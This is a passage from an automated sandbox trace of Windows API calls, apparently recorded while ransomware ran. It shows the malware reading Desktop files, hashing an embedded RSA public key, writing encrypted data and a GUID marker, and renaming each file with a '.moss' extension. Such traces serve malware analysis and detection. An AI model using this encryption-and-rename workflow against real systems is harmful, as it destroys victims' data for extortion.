lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xc141, lpOverlapped=0x0) returned 1 [0170.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.136] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.138] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.138] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.138] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.138] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.139] GetLastError () returned 0x0 [0170.139] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.139] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.139] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.139] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.139] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.139] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.140] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc141, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.140] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.140] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0170.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0170.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0170.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0170.140] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.140] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0170.140] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0170.140] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0170.141] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.141] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.141] CloseHandle (hObject=0x664) returned 1 [0170.142] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0170.142] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8b0) returned 0x3b4b098 [0170.142] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45fd8 | out: hHeap=0xcd0000) returned 1 [0170.142] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1YBskjnaQkYli5_rl5k.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1ybskjnaqkyli5_rl5k.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\1YBskjnaQkYli5_rl5k.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\1ybskjnaqkyli5_rl5k.flv.moss")) returned 1 [0170.143] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.143] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.143] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.144] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3330 | out: hHeap=0xcd0000) returned 1 [0170.144] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8ba880, ftCreationTime.dwHighDateTime=0x1d5dcde, ftLastAccessTime.dwLowDateTime=0x398d4940, ftLastAccessTime.dwHighDateTime=0x1d5e133, ftLastWriteTime.dwLowDateTime=0x398d4940, ftLastWriteTime.dwHighDateTime=0x1d5e133, nFileSizeHigh=0x0, nFileSizeLow=0x15b20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Blv.jpg", cAlternateFileName="")) returned 1 [0170.144] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.145] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3330 [0170.145] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0170.145] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\4Blv.jpg") returned=".jpg" [0170.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\4Blv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\4blv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.145] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=88864) returned 1 [0170.145] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.148] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15afa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.148] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.149] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.149] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.150] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.150] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x15b20, lpOverlapped=0x0) returned 1 [0170.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.151] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.151] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.152] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.152] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.152] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.152] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.152] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.152] GetLastError () returned 0x0 [0170.152] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.152] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.152] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.152] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.152] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.153] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.153] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x15b20) returned 0x3b62d40 [0170.153] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.153] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0170.153] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bf20 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc1d0 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bf68 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc1e8 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc218 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc230 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.154] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.154] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc218 | out: hHeap=0xcd0000) returned 1 [0170.154] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc230 | out: hHeap=0xcd0000) returned 1 [0170.154] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.154] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.154] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc230 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc218 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3b44690 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0170.154] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.154] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc230 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc218 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.155] GetCurrentThreadId () returned 0x324 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49d10 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.155] GetCurrentThreadId () returned 0x324 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.155] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.155] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.156] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.156] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.156] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc218 [0170.156] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0170.156] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.157] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15b20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.157] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.157] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.157] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.157] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.157] CloseHandle (hObject=0x664) returned 1 [0170.159] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\4Blv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\4blv.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\4Blv.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\4blv.jpg.moss")) returned 1 [0170.160] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.160] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.160] VirtualFree 